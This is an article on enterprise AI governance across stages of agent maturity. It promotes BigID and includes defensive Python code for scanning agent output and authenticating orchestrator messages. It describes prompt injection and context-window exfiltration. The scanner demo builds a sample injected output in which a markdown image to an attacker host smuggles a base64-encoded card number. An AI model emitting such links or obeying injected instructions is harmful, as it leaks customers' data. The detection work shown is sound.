Most organizations are not at a single stage of AI maturity. They operate across three or four stages simultaneously, each with radically different levels of governance. That is the stage problem—and it is why the control layer has to be built before the ecosystem grows any larger.
I recently recorded an episode of Ctrl+Alt+AI with Dimitri Sirota, CEO of BigID, in which we mapped the six stages of AI evolution, from early machine learning to autonomous multi-agent systems. The conversation highlighted something I want on the record: the governance gap in enterprise AI is not primarily a technology problem. It is a matter of stage awareness.
The six stages, briefly: Stage 1 was ML as a signal generator — 2010 to 2017. AI surfaced a recommendation; a human made every consequential decision. Stage 2 gave us language models that could understand and generate language, still fundamentally assistive. Stage 3 was the Copilot moment—an interactive collaborator in your IDE, browser, and inbox. Stage 4 is where everything changed: agents gained tools and memory. They could browse the web, write to a database, call an API, and remember context across sessions. Stage 5 is standardized system interconnection—agents reach across enterprise systems, data sources, and tools through standardized interfaces rather than custom integrations rebuilt for every endpoint. MCP is the clearest current example of this emerging standard, but the stage is defined by the capability, not the protocol: seamless, governed, multi-system reach that lets an agent operate across an organization’s full technology stack without a custom integration for each surface. Stage 6 is the destination: autonomous, multi-agent, running full workflows without human handoffs.
Most organizations are simultaneously somewhere between Stages 3 and 5, and governance models have not kept up with any of it. I have seen this firsthand at many companies. The access model was built around human employee lifecycle events—onboarding, offboarding, and role changes. It had no concept of a non-human identity provisioned by a developer on a Tuesday afternoon, querying 200 tables in a single automated run, and never appearing in any HR system. The access review cycle was quarterly. The agent was in production by the afternoon.
The failure mode I see most often across my advisory portfolio — at e-commerce and travel companies, fintechs, and cloud infrastructure companies — is treating AI governance as separate from data governance. Teams deploy a point solution for AI risk that does not share a data model with their Data Security Posture Management (DSPM) or access governance platform. You end up with three systems, each with a partial view, none of which can answer the questions that actually matter: what sensitive data did this agent access; was that access appropriate given the full context of what the data is (its sensitivity classification, who owns it, what systems it flows through, and what regulatory exposure it carries); and is anything anomalous happening right now?
That is the integration gap BigID’s architecture closes. DSPM, Data Access Governance (DAG), and data activity monitoring (DAM) are unified under a single data model. Access governance without a data intelligence layer is always one step removed from the actual risk. Determining whether an agent’s access is legitimate — not just permissioned, but genuinely appropriate — requires the broadest possible context: what the data is, how sensitive it is, who is accountable for it, how it relates to other data assets, and what the agent was supposed to be doing in the first place. That context is exactly what BigID’s unified data intelligence layer holds, and it is what makes the difference between a governance platform that detects anomalies and one that can actually judge them. The agent problem makes that gap catastrophic at speeds and scales humans never achieved.
The threat landscape of agentic AI is also more novel than most security teams have internalized. Prompt injection — ranked the top vulnerability on OWASP’s 2025 LLM Top 10 — is not a prompt-quality problem. It is a trust-boundary problem. The model cannot distinguish instructions it should follow from data it should merely read; both arrive as tokens in the same window. When an agent has access to your customer database, internal documents, and email system, every piece of content it processes becomes a potential attack surface, and the agent cannot verify that the content is not adversarial. The boundary therefore has to be enforced outside the model, in the layer that decides which tool calls are allowed to take effect. At fintech and payment companies, where I advise on technology strategy, agents operating in financial infrastructure mean that the consequences of a successful injection are not just a bad output—they are a transaction.
The context window as an exfiltration vector is a related problem that is even less understood. An adversary who can influence what goes into an agent’s context window can cause the agent to encode sensitive data into an output that is transmitted to a location where it should not go. Most organizations have no visibility into what is in the context window at any given moment. That is an open attack surface with no detective control in front of it.
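A detective control for this vector sits at the egress point: before an agent's output is rendered or transmitted, inspect every URL it contains and ask whether any component decodes to data that was in the context window. The block below is an added example, not the article's or BigID's code. It flags links and auto-loading markdown images to hosts outside an assumed allowlist, and it decodes path segments, query parameters and fragments (percent-encoding, standard or URL-safe base64, hex) and compares them against the sensitive values the agent was given. The allowlist, the customer record and the agent output are constructed.

```python
"""Egress scan of agent output for context-window data (added example)."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Iterator, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

URL_RE = re.compile(r"""https?://[^\s<>"')\]]+""")
MD_IMAGE_RE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

# Hosts the agent's rendered output may reference without review (assumed).
ALLOWED_HOSTS = {"support.example.com", "docs.example.com"}


@dataclass(frozen=True)
class Finding:
    url: str
    reason: str


def _normalize(s: str) -> str:
    """Compare without spaces, dashes or case so '4111 1111 ...' matches '4111...'."""
    return re.sub(r"[\s\-]", "", s).lower()


def _decodings(component: str) -> Iterator[str]:
    """Plaintext forms a URL component might hide: as-is, percent-decoded,
    base64 (standard or URL-safe, padding tolerant) and hex."""
    seen = set()
    for cand in (component, unquote(component)):
        if cand in seen:
            continue
        seen.add(cand)
        yield cand
        padded = cand + "=" * (-len(cand) % 4)
        try:
            # altchars maps '-_' to '+/', so one call covers both alphabets
            yield base64.b64decode(padded, altchars=b"-_", validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            pass
        if len(cand) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", cand):
            yield bytes.fromhex(cand).decode("utf-8", "ignore")


def _components(url: str) -> Iterator[str]:
    parts = urlsplit(url)
    yield from (seg for seg in parts.path.split("/") if seg)
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        yield key
        yield value
    if parts.fragment:
        yield parts.fragment


def _leaks(url: str, needles: set[str]) -> Optional[str]:
    """Return the first URL component that decodes to a sensitive value, else None."""
    for comp in _components(url):
        for plain in _decodings(comp):
            norm = _normalize(plain)
            if any(n in norm for n in needles):
                return comp
    return None


def scan_output(text: str, sensitive_values: set[str]) -> list[Finding]:
    """One finding per URL that points off-allowlist, and one per URL that
    carries a sensitive value in some encoding."""
    findings: list[Finding] = []
    # Very short values would match by accident; require at least 6 chars.
    needles = {n for n in map(_normalize, sensitive_values) if len(n) >= 6}
    image_urls = set(MD_IMAGE_RE.findall(text))
    for url in URL_RE.findall(text):
        host = (urlsplit(url).hostname or "").lower()
        kind = "auto-loading image" if url in image_urls else "link"
        if host not in ALLOWED_HOSTS:
            findings.append(Finding(url, f"{kind} to non-allowlisted host {host}"))
        comp = _leaks(url, needles)
        if comp is not None:
            findings.append(Finding(url, f"sensitive value encoded in URL component {comp!r}"))
    return findings


def demo() -> list[Finding]:
    # Constructed: a customer record the agent loaded into its context window.
    record = {"email": "dana@customer.example", "card": "4111 1111 1111 1111"}
    # Constructed: output an agent might emit after an injected instruction told
    # it to "include a tracking pixel". The card number rides along in a
    # URL-safe base64 query parameter; the image loads without any click.
    payload = base64.urlsafe_b64encode(b"4111111111111111").decode().rstrip("=")
    output = (
        "Your order has shipped. Track it at https://support.example.com/track/9911\n"
        f"![status](https://cdn.attacker.example/p.png?c={payload})"
    )
    return scan_output(output, set(record.values()))


if __name__ == "__main__":
    for f in demo():
        print(f"{f.reason}: {f.url}")
```

In practice the set of sensitive values comes from whatever classified the data the agent read (the DSPM layer the article describes), and the scan runs on every outbound message, not only on rendered text.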
And then there is the multi-agent trust problem, which will define Stage 6 security. In a multi-agent system, an orchestrator agent spawns and directs subagents. The subagent receives instructions from the orchestrator — but there is no formal mechanism for the subagent to verify that the orchestrator is legitimate and has not been compromised. Attackers exploit implicit trust between system components. We think about cloud services authenticating to each other at every boundary. The same principle must apply to agent-to-agent communication, yet the tooling is essentially nonexistent today.
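What the missing mechanism would look like is not exotic: the orchestrator authenticates every instruction it sends, and the subagent verifies origin, freshness and scope before acting. The block below is an added example, not code from the article or from any agent framework. It uses a per-subagent HMAC key over a canonical JSON envelope (one key per pair, so a compromised subagent cannot forge instructions to its peers), a timestamp window and a nonce set against replay, and a per-subagent allowed-tool set so that even an authentic orchestrator cannot push a subagent outside its delegated scope. Agent names, tool names and the fixed clock are constructed; a deployment with many verifiers would use asymmetric signatures instead of HMAC.

```python
"""Authenticated orchestrator-to-subagent instructions (added example)."""
import copy
import hashlib
import hmac
import json
import secrets
import time
from dataclasses import dataclass, field
from typing import Any, Optional


def _canonical(obj: Any) -> bytes:
    """Deterministic serialization so both sides MAC the same bytes."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


@dataclass
class Orchestrator:
    agent_id: str
    keys: dict[str, bytes]  # one key per subagent

    def instruct(self, subagent_id: str, task_id: str, tool: str,
                 args: dict, now: Optional[int] = None) -> dict:
        body = {
            "from": self.agent_id, "to": subagent_id, "task": task_id,
            "tool": tool, "args": args,
            "ts": now if now is not None else int(time.time()),
            "nonce": secrets.token_hex(8),
        }
        mac = hmac.new(self.keys[subagent_id], _canonical(body), hashlib.sha256).hexdigest()
        return {"body": body, "mac": mac}


@dataclass
class Subagent:
    agent_id: str
    key: bytes
    orchestrator_id: str
    allowed_tools: frozenset
    max_skew: int = 300
    seen_nonces: set = field(default_factory=set)

    def verify(self, envelope: dict, now: Optional[int] = None) -> tuple[bool, str]:
        """Authenticity first, then addressing, freshness, replay, scope."""
        body = envelope.get("body", {})
        expected = hmac.new(self.key, _canonical(body), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, str(envelope.get("mac", ""))):
            return False, "bad mac"
        if body.get("from") != self.orchestrator_id:
            return False, "unexpected sender"
        if body.get("to") != self.agent_id:
            return False, "not addressed to me"
        now = now if now is not None else int(time.time())
        if abs(now - int(body.get("ts", 0))) > self.max_skew:
            return False, "stale"
        if body.get("nonce") in self.seen_nonces:
            return False, "replay"
        if body.get("tool") not in self.allowed_tools:
            return False, "tool outside delegated scope"
        self.seen_nonces.add(body["nonce"])
        return True, "ok"


NOW = 1_700_000_000  # fixed clock so the demo is deterministic


def demo() -> dict[str, tuple[bool, str]]:
    """Legitimate, replayed, tampered, forged, out-of-scope and stale messages."""
    reader_key = secrets.token_bytes(32)
    orch = Orchestrator("orchestrator-1", {"reader-1": reader_key})
    reader = Subagent("reader-1", reader_key, "orchestrator-1",
                      frozenset({"read_table", "summarize"}))

    legit = orch.instruct("reader-1", "task-42", "read_table", {"table": "orders"}, now=NOW)
    results = {"legit": reader.verify(legit, now=NOW)}
    results["replay"] = reader.verify(legit, now=NOW)

    tampered = copy.deepcopy(legit)
    tampered["body"]["tool"] = "export_table"   # changed in transit: MAC no longer matches
    results["tampered"] = reader.verify(tampered, now=NOW)

    # An attacker without the pair key cannot produce a valid MAC.
    forger = Orchestrator("orchestrator-1", {"reader-1": secrets.token_bytes(32)})
    results["forged"] = reader.verify(
        forger.instruct("reader-1", "task-42", "read_table", {"table": "orders"}, now=NOW), now=NOW)

    # Authentic but outside what this subagent was delegated.
    results["out_of_scope"] = reader.verify(
        orch.instruct("reader-1", "task-42", "drop_table", {"table": "orders"}, now=NOW), now=NOW)

    results["stale"] = reader.verify(
        orch.instruct("reader-1", "task-42", "read_table", {}, now=NOW - 3600), now=NOW)
    return results


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name}: {'accepted' if ok else 'rejected'} ({reason})")
```

The scope check is the part most often forgotten: authenticating the orchestrator tells the subagent who is speaking, not whether that speaker is entitled to ask for this action, and a compromised orchestrator is precisely the case where the second question matters.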
The last point I’ll leave you with is the one I emphasized most in the podcast conversation: governance that creates friction does not get adopted—it gets worked around. I’ve worked at many companies rapidly scaling to hundreds of millions of customers. Governance that slowed deployment was not an option. The answer was governance that moved as fast as the business—automated, data-driven, and embedded in the development workflow rather than bolted on as an audit layer afterward.
Architecturally, BigID’s AskBigID capability and Prompt-Based Classification enable governance at machine speed. If your governance platform is slower than your deployment cadence, it loses. Organizations that operationalize governance as an automated control layer—rather than a manual review process—can safely scale to Stages 5 (standardized system interconnection) and 6 (autonomous multi-agent workflows). Those who treat governance as a compliance exercise will be rebuilding after an incident they could have prevented.
Start now. The permissions you grant an agent today, the credentials that never get rotated, and the multi-agent pipelines running without trust verification — those are the incidents you will be investigating 18 months from now. I have seen what cleanup looks like at scale across companies with complex data estates spanning multiple jurisdictions. The cost of getting ahead of it is an order of magnitude lower than the cost of responding after something goes wrong.
As originally published in The Retrospective on LinkedIn.